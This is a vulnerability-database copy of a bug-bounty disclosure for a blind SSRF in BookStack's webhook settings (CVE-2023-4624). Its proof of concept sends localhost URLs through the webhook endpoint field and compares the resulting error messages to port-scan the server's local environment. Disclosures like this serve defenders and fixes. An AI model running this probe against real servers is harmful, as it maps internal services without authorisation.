Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
huntrScgajge129CE5CEF6-E546-44E7-ADDF-A2726FA4E60C
HistoryJul 27, 2023 - 1:14 p.m.

Server Side Request Forgery (SSRF)

2023-07-2713:14:08
scgajge12
www.huntr.dev
8
ssrf
webhook
port scanning

EPSS

0.001

Percentile

23.9%

JSON

Description

It is possible to access the local environment in the Webhook function.
Therefore, Blind SSRF makes it possible to perform a port scan against the local environment.

Proof of Concept

After logging in, access the webhook setting page, specify the URL with the following pattern, and check that you can access the local environment from the message difference.

Payload

Open Port

http://localhost:80

Closed Port

http://localhost:1234

Request

POST /settings/webhooks/create HTTP/2
Host: demo.bookstackapp.com
 ...

_token=6AoIWKtSMXumoIqe2YyXsDREcraLVqwaIjf8VEV0&active=true&name=a&endpoint=http%3A%2F%2Flocalhost%3A1234%2F&timeout=20&events%5B%5D=all

Response Result (Error Message)

Open Port

 Response status from endpoint was 405

Closed Port

cURL error 7: Failed to connect to localhost port 1234 after 0 ms: Connection refused (see https://curl.haxx.se/libcurl/c/libcurl-errors.html) for http://localhost:1234/

PoC Video

https://drive.google.com/file/d/1SM3HwCulnW_09L8FYo6V4wWc4tx95rYC/view?usp=drive_link

Related

cve 1
nvd 1
cvelist 1
prion 1
osv 1
cve
cve
CVE-2023-4624
2023-08-30 13:15:15
nvd
nvd
CVE-2023-4624
2023-08-30 13:15:15
cvelist
cvelist
CVE-2023-4624 Server-Side Request Forgery (SSRF) in bookstackapp/bookstack
2023-08-30 12:02:20
prion
prion
Server side request forgery (ssrf)
2023-08-30 13:15:00
osv
osv
CVE-2023-4624
2023-08-30 13:15:15

EPSS

0.001

Percentile

23.9%

JSON
Related for 9CE5CEF6-E546-44E7-ADDF-A2726FA4E60C
cve1nvd1cvelist1prion1osv1